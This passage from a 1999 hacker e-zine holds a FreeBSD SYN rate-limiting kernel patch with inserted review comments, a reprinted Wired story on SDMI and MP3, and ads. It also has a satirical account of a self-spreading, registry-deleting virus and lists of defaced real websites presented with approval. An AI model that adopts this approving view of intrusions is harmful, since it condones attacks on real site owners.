#define TCPCTL_RECVSPACE 9 /* receive buffer space */

#define TCPCTL_KEEPINIT 10 /* receive buffer space */
#define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */
! #define TCPCTL_MAXID 12

#define TCPCTL_NAMES { \
{ 0, 0 }, \
--- 309,316 ----
#define TCPCTL_RECVSPACE 9 /* receive buffer space */
#define TCPCTL_KEEPINIT 10 /* receive buffer space */
#define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */
! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */
! #define TCPCTL_MAXID 13

#define TCPCTL_NAMES { \
{ 0, 0 }, \
***************
*** 320,325 ****
--- 325,331 ----
{ "recvspace", CTLTYPE_INT }, \
{ "keepinit", CTLTYPE_INT }, \
{ "pcblist", CTLTYPE_STRUCT }, \
+ { "synlim", CTLTYPE_INT }, \
}

#ifdef KERNEL
*** netinet/tcp_input.c.old Sat May 15 23:08:10 1999
--- netinet/tcp_input.c Sun May 16 01:33:51 1999
***************
*** 72,77 ****
--- 72,85 ----
static struct tcpiphdr tcp_saveti;
#endif

+ #ifdef SYN_RATELIM
+ static int synlim = 100;
+ SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, "");
+ #else
+ static int synlim = -1;
+ SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, "");
+ #endif
+
static int tcprexmtthresh = 3;
tcp_seq tcp_iss;
tcp_cc tcp_ccgen;
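Review bot: both SYSCTL_INT calls pass "" as the description string; give net.inet.tcp.synlim a one-line description such as "Max SYNs per second accepted; <= 0 disables" so that the knob is self-documenting, and say in the #else branch's description that the read-only -1 means the feature was compiled out, since nothing else tells an operator why the sysctl refuses writes.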
***************
*** 98,104 ****
struct tcpiphdr *, struct mbuf *));
static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *));
static void tcp_xmit_timer __P((struct tcpcb *, int));
!

/*
* Insert segment ti into reassembly queue of tcp with
--- 106,112 ----
struct tcpiphdr *, struct mbuf *));
static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *));
static void tcp_xmit_timer __P((struct tcpcb *, int));
! static int syn_ratelim(void);

/*
* Insert segment ti into reassembly queue of tcp with
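Review bot: the prototype `static int syn_ratelim(void);` is added unconditionally, but the definition in the next hunk sits inside #ifdef SYN_RATELIM, so a kernel built without the option declares a static function that is never defined; the definition is also written `int syn_ratelim(void)` without `static`, disagreeing with this declaration. Wrap the prototype in the same #ifdef, make the definition static, and use the `__P((void))` form the neighbouring prototypes use.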
***************
*** 130,135 ****
--- 138,183 ----
} \
}

+ #ifdef SYN_RATELIM
+ int syn_ratelim(void)
+ {
+ static int lticks;
+ static int lpackets;
+ int dticks;
+
+ /*
+ * Return ok status if feature disabled or argument out of
+ * ranage.
+ */

+
+ if (synlim <= 0)
+ return(0);
+
+ dticks = ticks - lticks;
+
+ /*
+ * reset stats when cumulative dt exceeds one second.
+ */

+
+ if ((unsigned int)dticks > hz) {
+ if (lpackets > synlim)
+ printf("syn rate limit reached %d/%d pps\n", lpackets, synlim);
+ lticks = ticks;
+ lpackets = 0;
+ }
+
+ /*
+ * bump packet count
+ */

+
+ if (++lpackets > synlim) {
+ return(-1);
+ }
+
+ return(0);
+ }
+ #endif
+
static int
tcp_reass(tp, ti, m)
register struct tcpcb *tp;
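Review bot: lpackets is a single global counter, so once it passes synlim every further SYN in that second is dropped regardless of source, which means legitimate connection attempts are refused for the remainder of each second of a flood; that CPU-for-connectivity trade-off should be stated in a comment at the top of the function (and in the sysctl description) so operators choose the limit knowingly. The first comment, "Return ok status if feature disabled or argument out of ranage", refers to an argument the function does not take and misspells "range"; trim it to "Return ok status if the feature is disabled".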
***************
*** 379,384 ****
--- 427,438 ----
ip_fw_fwd_addr = NULL;
} else
#endif /* IPFIREWALL_FORWARD */
+
+ #ifdef SYN_RATELIM
+ if ((tiflags & TH_SYN) && !(tiflags & TH_ACK))
+ if (syn_ratelim() < 0)
+ goto drop;
+ #endif

inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport,
ti->ti_dst, ti->ti_dport, 1);
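Review bot: when IPFIREWALL_FORWARD is also enabled this hunk changes control flow: the new `if` is inserted between the `} else` and the `inp = in_pcblookup_hash(...)` that used to be its body, so the rate-limit check becomes the else-branch and the pcb lookup that follows now runs unconditionally, overwriting the lookup the forwarding branch just performed; the SYN limit then also applies only to non-forwarded packets. Move the check above the `#ifdef IPFIREWALL_FORWARD` block so the `else` stays attached to the original lookup, keeping `goto drop` as the drop path.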

@HWA

57.0 Industry rises up against MP3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I was waiting for this; it took them long enough, but it looks like the industry is finally waking up to
the threat of MP3 and beginning to make some noise about it.

MUSIC BIZ BUILDS A TIME BOMB (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19682.html


The Recording Industry Association of America is out to
exterminate MP3 -- and is pressuring hardware and software
makers to build in a "kill switch" that would take care of
it once and for all. By Christopher Jones.

Music Biz Builds A Time Bomb
by Christopher Jones

3:00 a.m. 14.May.99.PDT
The future of digital music delivery is at stake as technology companies and record labels try to bridge
their multibillion-dollar industries. But the two sides are making little progress, reports one tech-
industry insider, who says that the music industry is taking a "my way or the highway" approach.

Facing the loss of its lucrative distribution chains and existing contracts with retailers, the record
industry has a plan to force hardware and software companies to exclusively adopt its Secure Digital Music
Initiative as the standard for delivering music online.


At last week's SDMI meeting in London, a handpicked committee proposed a plan that could force hardware and
software developers to choose among wannabe SDMI, the de facto standard MP3, or a different compressed file
format for the development of digital music players and similar hardware.

SDMI backers want manufacturers to build a time-bomb trigger into their products that, when activated at a
later date, would prevent users from downloading or playing non-SDMI-compliant music. The hardware would
initially support MP3 and other compressed file formats, but a signal from the RIAA would activate the
blocking trigger.

Hardware and software developers that refuse to build in the switch would not have access to the SDMI
specifications or the major-label music that will be made available when the specification is complete.

According to a source who attended the SDMI meeting last week, participants discovered that the Internet and
music industries have precious little in common. Coming to a consensus on the delivery of digital music may
be all but impossible, said the source, who requested anonymity.

Committee members from the technology industry were convinced that record labels don't "get" the Internet,
where open standards are the norm. Others were upset that the subcommittee was so exclusive. Microsoft,
Lucent, and a handful of PC manufacturers were the only technology companies present in sessions dominated
by the RIAA and its record labels.

"There was a lot of distaste around the room and loud conversations in the hallway with Leo [Leonardo
Chiariglione, executive director of SDMI] and Cary [Sherman, senior executive vice president for the RIAA],"
the source said.

The RIAA refused to comment on the negotiations.

"Ultimately, if it continues down this path, there will be an unworkable solution for the customers," said
the SDMI source. "Will I buy a Rio that supports MP3, or possibly a Samsung player that does not? The labels
are concerned about their distribution channels and how the stores will treat them. But while there are 30,000
titles in brick-and-mortar, the labels own 10 times that."


Another source who attended the meeting, and who also asked to remain anonymous, said that PC and hardware
makers are resisting the RIAA's plans because they see an immediate market for MP3-based players. Already there
are many players on the street and under development, and the market for selling legitimate MP3 music and
products is in its infancy.

"This transition group asked the question, 'do we ban MP3s?' and the answer was a clear and resounding 'no'
from PC makers. They are not going to drop support for MP3 anytime soon, and more and more manufacturers want
to have players ready for Christmas," said the source. For other companies caught in the middle of the debate,
the issues were not so clear-cut. "With companies like Sony, that sell both content and hardware and are on both
sides of the battle, it's very interesting," the source said.

The initial SDMI specification for portable players is due by the end of June, and a full-blown architecture by
March 2000. There are several encryption and security companies currently working on the proposed trigger device
that will present their solutions within the next few weeks. The next SDMI meeting is scheduled for next week in
Washington.

"This reminds me of the early days of the CD recording market, with all the different file formats and people
jockeying for position. The same thing is happening here, but there are 250 participants," said Dave Ulmer,
general manager of Adaptec's software products group, who was at the SDMI meeting in London. "There are companies
that see their future hinging on being part of this SDMI solution, and others just want to know what it is."


One source said that "there is no way in hell" that SDMI-compliant products will be ready for the Christmas
season because "the individuals involved in these conversations are too concerned about their interests and [are]
not looking for a real solution. Some guy with a digital kiosk wants everything for kiosks, and another guy with
encryption wants his stuff in, and so on."


Steve Grady, vice president of marketing at MP3 retailer GoodNoise, said that if the record labels don't put the
consumer first in their architecture plans, piracy will only increase and the industry could ultimately lose out
on new business opportunities on the Web.

"The problem is that you're talking about consumers and people adopting a technology and using music in a certain
way. But you have to stay focused on the consumer here. What you're competing against is free product, and that
won't go away," Grady said. "Something better than MP3 will come along. The ability to move music around is key,
and if you try to force something that has attributes they don't want, it won't be successful."


While the SDMI specification may ultimately become the standard for the music industry, there is no guarantee that
it has the inside track.

During the past few weeks, recording industry companies have formed alliances that could undermine SDMI's acceptance.
Lucent teamed up with the Universal Music Group, while Microsoft allied with Sony on content distribution deals.

In the coming months, the SDMI equation could get even more complicated if the major labels decide to go their own way.

"What's interesting is Universal and Sony. It's like the Oklahoma land rush with their marketing power and Microsoft's
monopoly," said one source. "If they get the market to adopt their standard, it's wide open. I don't think SDMI has a
lock on what the standard will be."


"Welcome to the software business," was the general sentiment among sources who recalled the similar battles over
standards within the Internet industry.

"[It's] turning into the Unix battle of the music industry," said one source, who said that ultimately open standards
will prevail. "Any company that tries [proprietary formats] realizes it fails. Look at IBM, one of the oldest computer
companies, and they've embraced the Web. It's a hard lesson, and the labels may have to learn it."


The RIAA has made it clear that it's willing to fight for its interests in the courts. It has the money and the muscle
to try to convince technology companies and Internet music vendors to see things its way. But just the same, it may not
win the battle.

"There is a big gap in the way major labels think about the world and what's going on today on the Internet. For all
the discussion on format battles, is there really a battle going on in the consumer space?" Grady said.

"There is only one player right now, and it's MP3. The only battle taking place is in meeting rooms. The Internet is
a different environment, and the labels need to understand the culture and what you are dealing with here," Grady said.



@HWA

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
******************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************

<a href="http://come.to/Canc0n99"><img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx

http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$

www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com/">www.kevinmitnick.com</a>

* * * * * * * * * * *

  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsors, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////


@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Attack of the Tuxissa Virus
March 29, 1999

What started out as a prank posting to
comp.os.linux.advocacy yesterday has turned into one of the
most significant viruses in computing history. The
creator of the virus, who goes by the moniker "Anonymous
Longhair", modified the well-known Melissa[1] virus to
download and install Linux on infected machines.

"It's a work of art," one Linux advocate told Humorix after
he looked through the Tuxissa virus source code. "This
virus goes well beyond the feeble troublemaking of
Melissa." The advocate enumerated some of the tasks the
virus performs in the background while the user is
blissfully playing Solitaire:

Once the virus is activated, it first works on propagating
itself. It has a built-in email harvesting module that
downloads all the pages referenced in the user's Internet
Explorer bookmarks and scans them for email addresses.
Using Outlook, the virus sends a copy of itself to every
email address it comes across.

After it has successfully reproduced, the virus begins the
tricky process of upgrading the system to Linux. First,
the virus modifies AUTOEXEC.BAT so that the virus will be
re-activated if the system crashes or is shut down while
the upgrade is in process. Second, the virus downloads a
stripped-down Slackware distribution, using a lengthy list
of mirror sites to prevent the virus from overloading any
one server.

Then the virus configures a UMSDOS filesystem to install
Linux on. Since this filesystem resides on a FAT
partition, there is no need to re-partition the hard drive,
one of the few actions that the Word macro language
doesn't allow.

Next, the virus uncompresses the downloaded files into the
new Linux filesystem. The virus then permanently deletes
all copies of the Windows Registry, virtually preventing
the user from booting into Windows without a re-install.
After modifying the boot sector, the virus terminates its
own life by rebooting the system. The computer boots into
the Slackware setup program, which automatically finishes
the installation of Linux. Finally, the dazed user is
presented with the Linux login prompt and the text,
"Welcome to Linux. You'll never want to use Windows again.
Type 'root' to begin..."


The whole process take about two hours, assuming the user
has a decent Internet connection. Since the virus runs
invisibly in the background, the user has no chance to stop
it until it's too late.

The email message that the virus is attached to has the
subject "Important Message About Windows Security". The
text of the body says, "I want to let you know about some
security problems I've uncovered in Windows 95/98/NT,
Office 95/97, and Outlook. It's critically important that
you protect your system against these attacks. Visit these
sites for more information..."
The rest of the message
contains 42 links to sites about Linux and free software.

Slashdot is one of those links. "That could spell
trouble," one Slashdot expert told Humorix. "Slashdot
could fall victim to the new 'Macro Virus Effect' if this
virus continues to propagate at its present exponential
growth rate. Red Hat's portal site, another site present
on the virus' links list, seems to be quite sluggish right
now..."


Details on how the virus started are a bit sketchy. The
"Anonymous Longhair" who created it only posted it to
Usenet as an early April Fool's gag, a demonstration of how
easy it would be to mount a "Linux revolution". Some other
Usenet reader is responsible for actually spreading the
virus into the wild. One observer speculated, "I imagine
the virus was first sent to the addresses of several
well-known spammers. The virus probably latched on to the
spammer's email lists and began propagating at a fantastic
rate. With no boundary to its growth, this thing could
wind up infecting every single Net-connected Wintel box in
the world. Wouldn't that be a shame!"


Linus Torvalds, who just left for a two week vacation, was
unavailable for comment at press time. We have a strong
feeling that his vacation will be cut short very soon...


[1] http://linuxtoday.com/stories/4463.html

---

James S. Baughn
http://i-want-a-website.com/about-linux/







@HWA



SITE.1 http://smog.cjb.net/
~~~~~~~~~~~~~~~~~~~~

Smogzer's site has news bytes from a wide range of interesting areas, from science and
technology to security; everything from Sony's new robot dog to Windump, the new Windows
version of tcpdump, is reported here. Check it out: the graphics are pleasing and the site
is well laid out. Go there now, you know you want to...

http://smog.cjb.net/

@HWA



H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz, racism is a mug's game! - Ed

* Hackers Against Racist Propaganda (See issue #7)


Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...


May 10th


Over the weekend some people were really busy...


From HNN's rumour section http://www.hackernews.com/
contributed by Anonymous


Cracked
It has been a busy weekend for some. Plenty of military and government servers and quite a
few new names popping up. A smattering of international servers and even mass domain cracks.
Here is the loooong list of servers that have been reported as cracked.

http://dailymp3z.net/
http://phoenix.placement.oakland.edu/
http://www.mursuky.edu
http://www.abstractcomputers.com
http://www.mursuky.edu
http://www.naturalbornassholes.com
http://www.usembassy-china.org.cn/
http://www.abstract.ab.ca
http://www.helio.com
http://lhs.vboard.com
http://ocse.acf.dhhs.gov
http://www.telephone.sk
http://www.uvd.com.hk
http://www.cowbells.com
http://www.cookieman.com
http://www.jimmyhollywood.com
http://www.bam.nl
http://www.boxman.nl
http://www.centraalbeheer.nl
http://www.clic.nl
http://sony.clic.nl
http://www.cmg.nl
http://www.defcom.nl
http://www.dmsa.nl
http://www.vitae.nl
http://www.hcmaatschap.nl
http://www.preview.nl
http://www.thehealing.nl
http://www.pds.nl
http://www.graphichat.com
http://www.helio.com
http://www.pagemate.com
http://www.thehealing.com
http://www.yousee.com
http://www.mount.n-yorks.sch.uk
http://www.I-spy.net
http://www.tax99.co.uk
http://www.spyteam.co.uk
http://www.sybase.it/
http://www.cool.co.il
http://www.worldclassbeauties.com
http://admin.engr.wisc.edu/
http://www.ntc.cap.af.mil/
http://www.sm.nps.navy.mil/
http://www.eh.doe.gov/
http://www.pwcyoko.navy.mil/
http://www.nem.barc.usda.gov/
http://safetynet.smis.doi.gov/
http://www.landersoil.com
http://www.webspace.it
http://www.motophoto.com
http://www.mount.n-yorks.sch.uk
http://www.cse.ca
http://ntcsslab.nosc.mil
http://sfbay.wr.usgs.gov
http://www.I-spy.net
http://www.netcom.be
http://www.spyteam.co.uk
http://www.tax99.co.uk
http://www.cowbells.com
http://www.cookieman.com
http://www.jimmyhollywood.com
http://ecure.bayareagold.com


May 11th

From HNN rumours section

Cracked
The following sites have been reported to HNN as
cracked.
http://ucnexus.berkeley.edu
http://www.scandi.com.mx
http://www.tdpnet.com
http://www.corel.com
http://www.whitehouse.gov
http://ns1.tornado.ie/


May 12th

From HNN rumours section

contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://www.nacced.org/
http://christianfamily.faithweb.com
http://ns1.tornado.ie
http://www.landersoil.com
http://www.lcpages.com


May 13th
From HNN rumours section;
contributed by Anonymous
Cracked
The following sites have been reported to HNN as
cracked.
http://hfobr.com
http://middletown.org
http://www.arcon.ru
http://www.cyberflirt.net
http://www.vboard.com
http://armstrong.scu.edu
http://www.autosportmag.com
http://www.sba.oakland.edu
http://www.des.uwm.edu
http://ceis.ha.osd.mil
http://www.lakehurst.navy.mil
http://www.unitedalbania.com
http://www.middletown.org
http://www.unitedalbania.com/
http://www.asus.com/
http://www.cyberflirt.com
http://www.swisstennis.com/
http://directory.metro.org
http://www.artleather.com/

May 14th
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://www.asus.com
http://kariba.africaonline.com
http://www.africaonline.com/
http://www.acb-is.net
http://directory.metro.org
http://www.cankaya.edu.t

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________



A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>


HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm


International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that
have security news from foreign countries for inclusion in this list,
thanks... - Ed



Belgium.......: http://bewoner.dma.be/cum/
<a href="http://bewoner.dma.be/cum/">Go there</a>

Brasil........: http://www.psynet.net/ka0z
<a href="http://www.psynet.net/ka0z/">Go there</a>

http://www.elementais.cjb.net
<a href="http://www.elementais.cjb.net/">Go there</a>

Colombia......: http://www.cascabel.8m.com
<a href="http://www.cascabel.8m.com/">Go there</a>

http://www.intrusos.cjb.net
<a href="http://www.intrusos.cjb.net">Go there</a>

Indonesia.....: http://www.k-elektronik.org/index2.html
<a href="http://www.k-elektronik.org/index2.html">Go there</a>

http://members.xoom.com/neblonica/
<a href="http://members.xoom.com/neblonica/">Go there</a>

http://hackerlink.or.id/
<a href="http://hackerlink.or.id/">Go there</a>

Netherlands...: http://security.pine.nl/
<a href="http://security.pine.nl/">Go there</a>

Russia........: http://www.tsu.ru/~eugene/
<a href="http://www.tsu.ru/~eugene/">Go there</a>

Singapore.....: http://www.icepoint.com
<a href="http://www.icepoint.com">Go there</a>

Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.

@HWA


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]

